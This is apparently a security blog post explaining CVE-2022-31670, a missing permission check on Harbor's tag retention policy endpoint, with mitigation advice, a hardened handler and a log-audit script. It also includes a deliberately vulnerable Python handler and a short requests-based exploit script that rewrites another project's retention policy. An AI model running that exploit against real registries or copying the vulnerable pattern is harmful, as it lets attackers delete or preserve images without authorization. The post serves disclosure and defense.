In a recently discovered vulnerability (CVE-2022-31670), Harbor, a popular open-source container image registry, fails to validate user permissions when updating tag retention policies, which allows authenticated users to modify the tag retention policies of projects they have no access to. In this post, I will guide you through the details of this vulnerability, how it is exploited, and what steps you can take to mitigate the issue.
Exploit Details
Due to an oversight in the permission validation process, Harbor does not check if the current user has the necessary access to a project when updating its tag retention policy. This means that if an attacker knows the ID of a project that they do not have access to, they can send a request to modify the tag retention policy of that project, potentially causing important container images to be deleted, or allowing outdated and vulnerable images to persist.
Below is an illustrative snippet (written in Python for readability; Harbor itself is implemented in Go) highlighting the missing check:
from flask import Flask, request, jsonify

app = Flask(__name__)


@app.route('/projects/<project_id>/retention', methods=['PUT'])
def update_retention_policy(project_id):
    """
    Update the tag retention policy for the specified project.
    """
    policy = request.json
    # The following line should check if the user has permission to modify the project.
    # However, it is missing, leading to the vulnerability.
    # check_permission(project_id, current_user)
    update_policy_in_database(project_id, policy)  # persists the policy, no authorization performed
    return jsonify({'status': 'success'})
In the snippet above, the call to check_permission(), which should confirm that the current user holds a role on the project that permits modifying its tag retention policy, is absent: the handler goes straight from parsing the request body to update_policy_in_database(), so the only thing standing between any authenticated user and another project's policy is knowledge of that project's ID.
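The hardened form of the handler, as an added example that is not Harbor's own code (Harbor is written in Go; the Role names, the in-memory Store, check_permission and update_policy_in_database below are assumptions for illustration): the project id taken from the request path is used to look up the caller's role on that specific project, and nothing is written unless that role permits it.

```python
# Added example, not Harbor's own code: a framework-independent version of the
# retention-policy handler with the authorization check restored. Role names,
# the in-memory Store, check_permission and update_policy_in_database are
# assumptions for illustration; Harbor itself is implemented in Go.
from dataclasses import dataclass, field
from enum import Enum


class Role(Enum):
    GUEST = "guest"
    DEVELOPER = "developer"
    MAINTAINER = "maintainer"
    PROJECT_ADMIN = "project_admin"


# Assumption for the example: only maintainers and project admins may change a
# project's tag retention policy. The important property is that the decision
# is made per project, keyed by the project id that came from the request path.
RETENTION_WRITE_ROLES = frozenset({Role.MAINTAINER, Role.PROJECT_ADMIN})


class PermissionDenied(Exception):
    """Raised when the current user may not perform the requested action."""


@dataclass
class Store:
    # project_id -> {username: Role}
    memberships: dict = field(default_factory=dict)
    # project_id -> retention policy (a JSON-like dict)
    policies: dict = field(default_factory=dict)


def check_permission(store: Store, project_id: str, current_user: str) -> None:
    """The check the vulnerable handler omits: the user must hold a role on
    *this* project that allows writing its retention policy. A valid account
    on the registry is not enough, and an unknown project id is denied too."""
    role = store.memberships.get(project_id, {}).get(current_user)
    if role not in RETENTION_WRITE_ROLES:
        raise PermissionDenied(
            f"user {current_user!r} may not modify the retention policy of project {project_id!r}"
        )


def update_policy_in_database(store: Store, project_id: str, policy: dict) -> None:
    store.policies[project_id] = dict(policy)


def update_retention_policy(store: Store, project_id: str, current_user: str, policy):
    """Fixed handler. Returns an (http_status, body) pair in place of a
    framework response object so it can be exercised without a web server."""
    try:
        check_permission(store, project_id, current_user)
    except PermissionDenied as exc:
        # Deny before touching any data; the same 403 is returned whether the
        # project exists or not, so the response does not enumerate projects.
        return 403, {"status": "forbidden", "error": str(exc)}
    if not isinstance(policy, dict):
        return 400, {"status": "bad_request", "error": "policy must be a JSON object"}
    update_policy_in_database(store, project_id, policy)
    return 200, {"status": "success"}


def build_sample_store() -> Store:
    """Constructed sample data: project 10 has an admin and a developer;
    mallory has a registry account and a role on project 11 only."""
    store = Store()
    store.memberships["10"] = {"alice": Role.PROJECT_ADMIN, "bob": Role.DEVELOPER}
    store.memberships["11"] = {"mallory": Role.PROJECT_ADMIN}
    return store


if __name__ == "__main__":
    s = build_sample_store()
    print(update_retention_policy(s, "10", "mallory", {"rules": []}))           # denied
    print(update_retention_policy(s, "10", "alice", {"rules": [{"keep": 5}]}))  # allowed
```

The check runs before the request body is even validated, and the 403 branch returns without touching the store, so a denied request has no side effect. Which roles count as writers is a policy decision; what matters for this CVE is that the lookup is keyed by the project id from the path rather than by the mere existence of a session.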
Exploiting the Vulnerability
For an attacker to exploit this issue, they need to have a valid user account on the Harbor instance, know the ID of a project they don't have access to, and send a PUT request to the /projects/<project_id>/retention API endpoint with the desired changes to the tag retention policy.
Here's a simple example of how an attacker could exploit this vulnerability using the requests library in Python:
import requests

harbor_url = 'https://harbor.example.org'
username = 'attacker'
password = 'attackers_password'
project_id = 'target_project_id'
new_policy = { ... }  # new tag retention policy data

# Authenticate with an ordinary user account; no membership in the target project is needed.
session = requests.Session()
session.auth = (username, password)
response = session.put(f'{harbor_url}/projects/{project_id}/retention', json=new_policy)

if response.status_code == 200:
    print('Successfully updated the tag retention policy')
else:
    print('Failed to update the tag retention policy')
The attacker would replace harbor_url, username, password, project_id, and new_policy with the appropriate values for the target Harbor instance.
References and Sources
The original advisory for CVE-2022-31670, along with the explanation of the vulnerability and potential impact, can be found here:
- CVE-2022-31670 - National Vulnerability Database (NVD)
- Original Advisory for CVE-2022-31670 - security_tracker
Mitigation Steps
To mitigate this vulnerability, it is crucial to apply the patch provided by the Harbor developers. The fixed version of Harbor properly checks user permissions before allowing tag retention policy updates.
- Harbor Release containing the fix
In addition, you should follow best practices for securing your Harbor instance, such as enabling and configuring role-based access control (RBAC), keeping Harbor up-to-date, and monitoring access logs for any suspicious activity.
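As an added example of the log monitoring suggested above (not part of the original post and not Harbor's own tooling), the script below replays access-log lines against a project membership table and flags every retention-policy write made by a user who holds no write role on the target project. The key=value log format, the membership table and the role names are constructed for the example; adapt the regular expression to the fields your reverse proxy or Harbor actually emits.

```python
# Added example, not part of the original post or of Harbor: audit access-log
# lines for retention-policy writes by users without a write role on the
# target project. Log format, memberships and role names are constructed here.
import re
from dataclasses import dataclass

# Assumption for the example: these roles may change a project's retention policy.
RETENTION_WRITE_ROLES = {"maintainer", "project_admin"}

# Constructed sample log lines in a key=value access-log style.
SAMPLE_LOG = """\
2024-11-14T12:15:17Z user=alice method=PUT path=/projects/10/retention status=200
2024-11-14T12:16:02Z user=mallory method=GET path=/projects/10/repositories status=200
2024-11-14T12:16:40Z user=mallory method=PUT path=/projects/10/retention status=200
2024-11-14T12:17:05Z user=bob method=PUT path=/projects/10/retention status=403
2024-11-14T12:18:11Z user=mallory method=PUT path=/projects/11/retention status=200
"""

# project_id -> {username: role}; constructed to match the sample log.
MEMBERSHIPS = {
    "10": {"alice": "project_admin", "bob": "developer"},
    "11": {"mallory": "project_admin"},
}

LOG_RE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) method=(?P<method>\S+) "
    r"path=(?P<path>\S+) status=(?P<status>\d+)$"
)
RETENTION_PATH_RE = re.compile(r"^/projects/(?P<project_id>[^/]+)/retention/?$")


@dataclass(frozen=True)
class Finding:
    timestamp: str
    user: str
    project_id: str
    status: int
    reason: str


def parse_line(line: str):
    """Return the log fields as a dict, or None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def find_unauthorized_retention_updates(log_text: str, memberships: dict,
                                        write_roles=RETENTION_WRITE_ROLES):
    """Return a Finding for every PUT to a retention endpoint whose user lacks
    a write role on that project. A 2xx status means the write went through,
    which is what an unpatched instance looks like; a denied attempt is still
    worth reporting because it shows someone probing other projects' ids."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["method"] != "PUT":
            continue
        pm = RETENTION_PATH_RE.match(rec["path"])
        if pm is None:
            continue
        project_id = pm.group("project_id")
        role = memberships.get(project_id, {}).get(rec["user"])
        if role in write_roles:
            continue
        status = int(rec["status"])
        reason = ("unauthorized retention write succeeded" if 200 <= status < 300
                  else "unauthorized retention write attempted")
        findings.append(Finding(rec["ts"], rec["user"], project_id, status, reason))
    return findings


if __name__ == "__main__":
    for finding in find_unauthorized_retention_updates(SAMPLE_LOG, MEMBERSHIPS):
        print(finding)
```

Run against the sample, the script reports mallory's successful write to project 10 and bob's denied attempt, and stays silent on alice's legitimate update and on mallory's write to project 11, where she is an admin. A successful finding on a pre-patch instance is a signal to review that project's current retention rules and recent tag deletions, not just to upgrade.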
Conclusion
In this post, we explored the CVE-2022-31670 vulnerability in Harbor, which allows unauthorized updates of tag retention policies due to the absence of proper permission validation. We covered the exploit details, provided code snippets to understand the problem, and demonstrated how an attacker might exploit this issue. Finally, we suggested mitigation steps to prevent unauthorized access to your Harbor projects' tag retention policies. Stay safe by keeping your software up-to-date!
Timeline
Published on: 11/14/2024 12:15:17 UTC
Last modified on: 11/15/2024 13:58:08 UTC